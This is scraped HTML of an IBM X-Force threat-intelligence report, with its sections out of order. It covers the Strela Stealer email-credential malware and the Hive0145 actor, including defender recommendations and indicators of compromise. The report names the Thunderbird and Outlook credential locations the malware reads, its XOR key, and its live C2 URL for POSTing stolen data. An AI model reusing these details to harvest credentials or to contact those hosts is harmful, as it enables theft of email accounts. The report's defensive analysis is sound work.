border-top: none; border-left: none; border-bottom: 1pt solid #dddddd; border-right: 1pt solid #dddddd; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #292929;">%APPDATA%\Thunderbird\Profiles\</span>logins.json</p> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #292929;">%APPDATA%\Thunderbird\Profiles\</span>key4.db</p> </td> <td style="width: 693.43px; border-top: none; border-left: none; border-bottom: 1pt solid #dddddd; border-right: 1pt solid #dddddd; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\</p> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\</p> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676</p> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676</p> </td> </tr> </tbody> </table> For Outlook, Strela Stealer specifically looks for the registry values: <ul type="disc"> <li>IMAP Server</li> <li>IMAP User</li> <li>IMAP Password - decrypted using <i>CryptUnprotectData()</i></li> </ul> The data is formatted and prepended with the string "FF" or "OL" for Thunderbird data and Outlook data, respectively. Next, it is also encrypted with a static XOR key, which represents a GUID string such as: <table class="ScrollCode" style="border: dashed #6199C9 1.0pt;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td style="width: 447.3pt; border: none; padding: 8.65pt 5.0pt 12.95pt 2.9pt;" valign="top"> <div style="border: none; border-left: none windowtext 1.0pt; padding: 0in 0in 0in 12.0pt; margin-left: 12.0pt; margin-right: 0in;"> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">96be98b2-8a00-410d-87da-2482cc8b7793</span></span></p> </div></td> </tr> </tbody> </table> Then, Strela Stealer sends a POST request for each email client to its hardcoded C2 server: <table class="ScrollCode" style="border: dashed #6199C9 1.0pt;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td style="width: 447.3pt; border: none; padding: 8.65pt 5.0pt 12.95pt 2.9pt;" valign="top"> <div style="border: none; border-left: none windowtext 1.0pt; padding: 0in 0in 0in 12.0pt; margin-left: 12.0pt; margin-right: 0in;"> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">http:</span></span><span style="color: #008200;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">//94.159.113[.]48/server.php</span></span></p> </div></td> </tr> </tbody> </table> The response is decrypted via the same XOR key above. Strela Stealer continues to send out POST requests in 1-second intervals until a request fails or it receives back the string "KH" (2023 versions), "ANTIROK" (2024 versions) or “CHOLLIMA” (Nov. 2024 versions). As of October 2024, Strela Stealer also includes two more exfiltration functions. The first gathers system information on the host and writes it to a file via the command: <img src="https://images2.cmp.optimizely.com/Zz0wZmQyMDI4MGEwODcxMWVmYWNmNDY2OGUwNDMwMWU2OQ==" alt="Strela Stealer screen1.png" width="683" height="58" /> The second exfiltration function uses COM objects to enumerate the list of installed applications from the "AppsFolder" (a virtual folder, displayed as "Applications") on the victim machine. <strong><img src="https://images3.cmp.optimizely.com/Zz03NjhhNWNkNmEwN2IxMWVmOTM2ODYyNGVkMjA4MzQyMg==" alt="fig 10-image-2024-10-31_14-21-3.png" width="673" height="511" /></strong> The dropped file, as well as the list of installed applications, are read and encrypted before exfiltration in the same fashion as the others. They are sent to the C2 server with identifiers "SI" and "LA" respectively. <h2>Language checks</h2> Strela Stealer started to implement language checks by verifying the keyboard language on the victim host. Versions throughout 2024 only run on hosts with one of the following keyboard languages: <ul type="disc"> <li>Spanish</li> <li>German</li> <li>Catalan</li> <li>Polish</li> <li>Italian</li> <li>Basque</li> </ul> <strong><img src="https://images2.cmp.optimizely.com/Zz1iMzU5YzM1ZWEwN2IxMWVmYWNmNDY2OGUwNDMwMWU2OQ==" alt="fig 11-image-2024-10-31_12-58-20.png" width="513" height="303" /></strong> In early November, Hive0145 started distributing stolen Ukrainian emails as well and modified the language verification logic slightly, adding Ukrainian (0x422) to the list of keyboard layouts. In addition, the developers switched to using the <i>GetKeyboardLayoutList</i> API to cover all installed keyboard layouts. If none of the languages match, Strela Stealer has a secondary check comparing the result of the user’s default locale from <i>GetLocaleInfoA </i>against “AU” and “UA”, which are the codes for Australia and Ukraine. It is possible that the developer was not sure of the endianness of the returned value and did not intend to target Australia. Overall, these changes increase the scope of machines available for a Strela Stealer infection. <strong><img src="https://images3.cmp.optimizely.com/Zz1iZWQ1MTFmMmEwN2IxMWVmOTI4NWU2NTBmNjQyY2Y2Ng==" alt="fig 12-image (9).png" width="667" height="91" /></strong> Previously the malware would display an unobtrusive error message to the user after running in order to not raise any suspicion. It states that the file was corrupted and not able to be opened, in the language depending on the installed keyboard. The latest versions use the more universal error message "Err 100", which is shown after 5 seconds from the beginning of execution. <h2>.NET variant</h2> In June 2023, X-Force observed a single Italy-targeted Hive0145 campaign delivering a new Strela Stealer variant that was completely rewritten in <strong>.NET</strong>. Similar to campaigns before it also made use of valid code signing certificates. Re-implementing malware in a different language shows a significant effort by the threat actor. In order to conceal strings, function names and control flow, the developers made use of the commercial "Aldaray Rummage Obfuscator" for <strong>.NET</strong>. The screenshot below shows the code used to access and unprotect IMAP credentials from Microsoft Outlook registry keys. <strong><img src="https://images3.cmp.optimizely.com/Zz1lMjkyOWY2MGEwN2IxMWVmOTM2ODYyNGVkMjA4MzQyMg==" alt="fig 13-image-2024-11-1_10-43-23.png" width="561" height="455" /></strong> Notably, the commercial obfuscator does include a watermark for the license, which was observed as: <table class="ScrollCode" style="border: dashed #6199C9 1.0pt;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td style="width: 447.3pt; border: none; padding: 8.65pt 5.0pt 12.95pt 2.9pt;" valign="top"> <div style="border: none; border-left: none windowtext 1.0pt; padding: 0in 0in 0in 12.0pt; margin-left: 12.0pt; margin-right: 0in;"> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">Rummage is licensed to Victoria Semigodova (issue J) </span></span><span style="color: #336699; font-weight: bold;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">for</span></span><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';"> use with any product. 5687c5da50660eda</span></span></p> </div></td> </tr> </tbody> </table> The sample above displays the following error message in Italian: <table class="ScrollCode" style="border: dashed #6199C9 1.0pt;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td style="width: 447.3pt; border: none; padding: 8.65pt 5.0pt 12.95pt 2.9pt;" valign="top"> <div style="border: none; border-left: none windowtext 1.0pt; padding: 0in 0in 0in 12.0pt; margin-left: 12.0pt; margin-right: 0in;"> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">Il file viene arrestato e non può essere eseguito.</span></span></p> </div></td> </tr> </tbody> </table> <h2>Hive0145 objectives</h2> Hive0145's focus on harvesting email credentials sets them apart from other operators of stealer or botnet malware, which are often commoditized and target a broader range of credentials and data, or facilitate follow-on payloads intended for initial access. Hive0145's use of stolen emails for attachment hijacking is an indicator that a portion of stolen email credentials may be used to harvest legitimate emails for further distribution. Both stolen and actor-created emails used by Hive0145 predominantly feature invoices as themes, which points towards potential financial motivation. It is possible that Hive0145 may sell stolen emails to affiliate partners for the purposes of further business email compromise. <h2>Conclusion:</h2> Hive0145 is a rapidly maturing cyber criminal threat actor and seeks to infect victims with the intention of gaining valid email credentials. Observations suggest that the theft of email credentials, through initial campaigns, led to further theft of valid emails used in subsequent attachment hijacking campaigns. Stela Stealer malware continues to be an effective tool for Hive0145 to extract email credentials. The wide variety of industries emulated by Hive0145's email campaigns increases the potential risk of being targeted for commercial organizations throughout Europe. Of note, organizations in Italian, Spanish, German, or Ukrainian-speaking regions may be at more immediate risk of a Hive0145 campaign. X-Force recommends heightened vigilance surrounding email attachments received and careful review of the expected file type delivered. <h2>Recommendations:</h2> X-Force recommends organizations: <ul type="disc"> <li>Exercise caution with emails and ZIP archive attachments</li> <li>Consider changing the default application for Javascript/JScript/VBScript files to Notepad</li> <li>Monitor rundll32.exe processes executing remotely hosted DLLs</li> <li>Install and configure endpoint security software</li> <li>Update relevant network security monitoring rules</li> <li>Educate staff on the potential threats to the organization</li> </ul> <table class="ScrollTableNormal" style="border-collapse: collapse; border: none;" border="1" cellspacing="0" cellpadding="0"> <thead> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; background: #F0F0F0; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Indicator</span></b></p> </td> <td style="width: 67.7pt; border: solid #DDDDDD 1.0pt; border-left: none; background: #F0F0F0; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Indicator Type</span></b></p> </td> <td style="width: 201.55pt; border: solid #DDDDDD 1.0pt; border-left: none; background: #F0F0F0; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Context</span></b></p> </td> </tr> </thead> <tbody> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">03853c56bcfdf87d71ba4e17c4f6b55f989edb29fc1db2c82de3d50be99d7311</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SHA256</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Stellar Loader (Oct 2024)</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">e50bea80513116a1988822fe02538d3af4d91505d4098afca4ea741bcf4cd427</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SHA256</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Stellar Loader (May 2024)</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">2cac42735170cd3f67111807a7e48f8fca104eb97c379129872249160d90e22d</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SHA256</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Stellar Loader - minimal obfuscation (Jan 2024)</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">9a032497b82c3db8146cb624b369f63bef76b302a5e25349156bdcb53af3fb84</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SHA256</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Strela Stealer payload</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">e4a7ad38aaea4bd27c32c57b5a52eac1020495cf8698a2b595b169a3c5c9313a</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SHA256</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Strela Stealer payload</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">2f7ac330e100b577748bb34bd8f7f655f6d138b90683594dbf06ccc41bb3751a</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SHA256</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Stellar Loader (Nov 2024)</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">94.159.113[.]48</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Strela Stealer C2</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #161616;">94.159.113[.]86</span></p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Strela Stealer C2</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #161616;">193.109.85[.]231</span></p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Strela Stealer C2</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">5906c8e683b8eb9d2bc104f3ca7abaa1f76c64ac694c46a0de5ec67456364f5d</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SHA256</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Strela Stealer .NET variant</p> </td> </tr> </tbody> </table>" } </script> <!-- BREADCRUMB SCHEMA --> <script id="post-schema" type="application/ld+json"> { "@context": "https://schema.org", "@type": "BreadcrumbList", "itemListElement": [ { "@type": "ListItem", "position": 1, "name": "Home", "item": "https://securityintelligence.com/" }, ] } </script> <div id="progressbar"> <amp-animation id="progress-animation" layout="nodisplay"> <script type="application/json"> { "duration": "1s", "iterations": "1", "fill": "both", "direction": "alternate", "animations": [{ "selector": "#progressbar", "keyframes": [{ "transform": "translateX(0)" }] }] } </script> </amp-animation> </div> <amp-position-observer target="post__content" intersection-ratios="0" viewport-margins="25vh 75vh" on="scroll:progress-animation.seekTo(percent=event.percent)" layout="nodisplay"></amp-position-observer> <div class="dark_background" style="background:black;"></div> <div class="container grid" style="background:black;"> <!-- Breadcrumbs --> <aside class="breadcrumbs "> <h1 class="breadcrumbs__page_title">Strela Stealer: Today’s invoice is tomorrow’s phish</h1> </aside> </div> <div class="container grid hero_background "> <div class="grid__content post "> <div class="post__thumbnail"> <amp-img alt="closeup on a digital screen with a red envelope & the word phishing in yellow & 2 yellow warning symbols" width="1200" height="630" layout="responsive" src="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments-630x330.jpeg.webp" srcset="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments-300x158.jpeg.webp 300w, /wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments-630x330.jpeg.webp 630w, /wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments.jpeg.webp 1200w, /wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments.jpeg.webp 2400w"> <amp-img fallback alt="closeup on a digital screen with a red envelope & the word phishing in yellow & 2 yellow warning symbols" width="1200" height="630" layout="responsive" src="https://securityintelligence.com/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments-630x330.jpeg" srcset="https://securityintelligence.com/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments-300x158.jpeg 300w, https://securityintelligence.com/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments-630x330.jpeg 630w, https://securityintelligence.com/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments.jpeg 1200w, https://securityintelligence.com/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments.jpeg 2400w"> </amp-img> </amp-img> </div> <div class="new_categoy"> <div class="category-container"> <div class="category"> <div class="theme"> <div class="form-check form-switch"> <div class="link-container"> <a href="#" class="theme-link" id="light-theme-link">Light</a> <a href="#" class="theme-link" id="dark-theme-link">Dark</a> </div> </div> </div> <hr class="separator"> <div class="author_date"> <div class="information"> <span class="date">November 12, 2024</span> <span class="author_category">By <a href="https://securityintelligence.com/author/golo-muhr/" >Golo Mühr</a> <span class="author_comma"></span><br> <!--== Co-Authors ==--> <!-- <br /> --> <a href="https://securityintelligence.com/author/joe-fasulo/">Joe Fasulo</a> <span class="author_comma"></span><br> <a href="https://securityintelligence.com/author/charlotte-hammond/">Charlotte Hammond</a> <br> </span> <span class="author_category"><span class="span-reading-time rt-reading-time"><span class="rt-label rt-prefix"></span> <span class="rt-time"> 12</span> <span class="rt-label rt-postfix">min read</span></span></span> </div> </div> <hr class="separator"> <div class="title"> <a href="https://securityintelligence.com/category/x-force/threat-intelligence/"><span class="name_category">Threat Intelligence<br> <a href="https://securityintelligence.com/category/x-force/malware-threat/"><span class="name_other_category">Malware<br> <a href="https://securityintelligence.com/category/x-force/"><span class="name_other_category">X-Force<br> </span></a> </div> <div class="social-container" style="visibility: hidden;"> <hr class="separator"> <div class="social"> <!-- Social ICONS --> <a href="https://twitter.com/intent/tweet?text=Strela Stealer: Today’s invoice is tomorrow’s phish&url=https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish/" target="_blank" rel="noopener noreferrer"><amp-img class="arrow" layout="fixed" height="26" width="26" src="https://securityintelligence.com/wp-content/themes/sapphire/images/social-icons/twitter.svg" alt="twitter"></amp-img></a> <a href="https://www.linkedin.com/shareArticle?url=https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish/" target="_blank" rel="noopener noreferrer"><amp-img class="arrow" layout="fixed" height="26" width="26" src="https://securityintelligence.com/wp-content/themes/sapphire/images/social-icons/linkedin.svg" alt="Linkedin" ></amp-img></a> <a href="https://www.facebook.com/sharer/sharer.php?u=https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish/" target="_blank" rel="noopener noreferrer"><amp-img class="arrow" layout="fixed" height="26" width="26" src="https://securityintelligence.com/wp-content/themes/sapphire/images/social-icons/facebook.svg" alt="facebook"></amp-img></a> <a href="https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish/" target="_blank" rel="noopener noreferrer"><amp-img class="arrow" layout="fixed" height="26" width="26" src="https://securityintelligence.com/wp-content/themes/sapphire/images/social-icons/link.svg" alt="An arrow pointing up"></amp-img></a> </div> </div> </div> <script> window.addEventListener('scroll', function() { var category = document.querySelector('.category'); var scrollPosition = window.scrollY; if (scrollPosition >= 0) { category.classList.add('sticky'); } else { category.classList.remove('sticky'); } }); // Function to set the light theme function setLightTheme(event, toSaveLocalStorage = true) { event.preventDefault(); const body = document.body; body.classList.remove('dark-theme'); // Save the user's theme preference in localStorage if (toSaveLocalStorage && !location.href.includes("/x-force/")) { setSiTheme('light'); } } // Function to set the dark theme function setDarkTheme(event, toSaveLocalStorage = true) { event.preventDefault(); const body = document.body; body.classList.add('dark-theme'); // Save the user's theme preference in localStorage if (toSaveLocalStorage && !location.href.includes("/x-force/")) { setSiTheme('dark'); } } // Add click event listeners to the theme links document.getElementById('light-theme-link').addEventListener('click', (event) => setLightTheme(event)); document.getElementById('dark-theme-link').addEventListener('click', (event) => setDarkTheme(event)); // Check localStorage to set the initial theme preference const themePreference = localStorage.getItem('si-theme-mode'); // Function to simulate a click event function simulateClick(handler, toSaveLocalStorage) { const event = new Event('click'); handler(event, toSaveLocalStorage); } // Apply the correct theme based on URL and preference if (location.href.includes("/x-force/")) { simulateClick(setDarkTheme, false); // Apply the dark theme for all x-force posts } else if (themePreference === 'dark') { simulateClick(setDarkTheme, true); // Apply the dark theme based on user preference } else if (themePreference === 'light') { simulateClick(setLightTheme, true); // Apply the light theme based on user preference (default) } else { simulateClick(setLightTheme, true); // Apply the light theme by default } </script> <script> const cookies = JSON.parse(localStorage.getItem("truste.eu.cookie.notice_preferences")); if (cookies && cookies.value === '2:') { document.querySelector('.social-container').style.visibility = 'visible'; } </script> </div> <main class="post__content post__content--continue_reading" id="post__content"> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <html><body><p>As of November 2024, IBM X-Force has tracked ongoing Hive0145 campaigns delivering <i>Strela Stealer</i> malware to victims throughout Europe – primarily Spain, Germany and Ukraine. The phishing emails used in these campaigns are real invoice notifications, which have been stolen through previously exfiltrated email credentials. Strela Stealer is designed to extract user credentials stored in Microsoft Outlook and Mozilla Thunderbird. During the past 18 months, the group tested various techniques to enhance its operation’s effectiveness. Hive0145 is likely to be a financially motivated initial access broker (IAB), active since late 2022 and potentially the sole operator of Strela Stealer. The continuous operational pace of Hive0145’s campaigns highlights an increased risk to potential victims across Europe.</p> <h2>Key Findings:</h2> <ul type="disc"> <li>Hive0145 is an initial access broker focused on targeting victims throughout Europe</li> <li>During the last 18 months, Strela Stealer has tested out a variety of techniques to improve its infection chain and extract email credentials</li> <li>As of July 2024, Hive0145 began using stolen emails to further spread Strela Stealer</li> <li>Hive0145 campaigns have increased in volume, with weekly campaigns as of 17 October 2024</li> <li>As of early November 2024, Hive0145 began targeting Ukraine with stolen invoice emails</li> <li>Hive0145 is potentially the sole operator of Strela Stealer</li> </ul> <h2>Background</h2> <p>Starting mid-April 2023, X-Force began tracking an increase in Hive0145 activity. Hive0145 is likely a financially motivated initial access broker (IAB) and potentially the sole operator of Strela Stealer. Strela Stealer is a <a href="https://www.ibm.com/topics/malware" target="_blank" rel="noopener nofollow" >malware</a> designed to extract user email credentials stored in Microsoft Outlook and Mozilla Thunderbird, potentially leading to Business Email Compromise (BEC). IABs routinely gather credentials and other data that is sold to affiliate <a href="https://www.ibm.com/topics/threat-actor" target="_blank" rel="noopener nofollow" >threat actors</a> specializing in victim network exploitation. However, it remains unknown if Hive0145 has a specific partner network for selling the access gained through their campaigns.</p> <p>Over the past year, Hive0145 has demonstrated proficiency in evolving tactics, techniques and procedures (TTPs) to target victims across Europe. Italian, Spanish, German and Ukrainian victims continue to receive weaponized attachments that entice the victim to open the file. The actor’s campaigns present the victim with fake invoices or receipts and often a short, generic message of urgency for victims to address. Upon loading the attached file, the victim unwittingly executes the infection chain leading to Strela Stealer malware.</p> <p><strong><amp-img src="https://images2.cmp.optimizely.com/Zz1iODZmNTg3OGEwN2ExMWVmYWNmNDY2OGUwNDMwMWU2OQ==" layout="intrinsic" class="" alt="fig 